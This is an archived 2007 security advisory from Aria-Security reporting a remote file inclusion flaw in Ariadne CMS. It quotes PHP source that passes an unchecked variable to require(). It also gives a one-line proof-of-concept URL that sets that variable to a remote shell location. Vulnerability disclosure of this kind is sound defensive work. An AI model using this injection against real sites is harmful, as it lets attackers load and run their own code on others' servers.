Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting

Ariadne CMS Remote File Inclusion

From: <Advisory(at)Aria-security.net>
Date: Mon Aug 06 2007 - 17:41:32 EDT


A R I A - S E C U R I T Y


Ariadne CMS Remote File Inclusion
Vendor: http://www.ariadne-cms.org/

Source Code:

<?php
  require("./ariadne.inc");
  require($ariadne."/configs/ariadne.phtml");

  $PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"];
?>

<html>
<head>
  <script>
    function LoadingDone() {
parent.LoadingDone();
}

PoC:
http://site.com/path/view.php?ariadne=SHELL?

Credits: Aria-Security Team
http://Aria-Security.net
http://outlaw.aria-security.info Received on Mon Aug 6 17:53:44 2007

Do you need help?X

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:11:02 EDT


Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library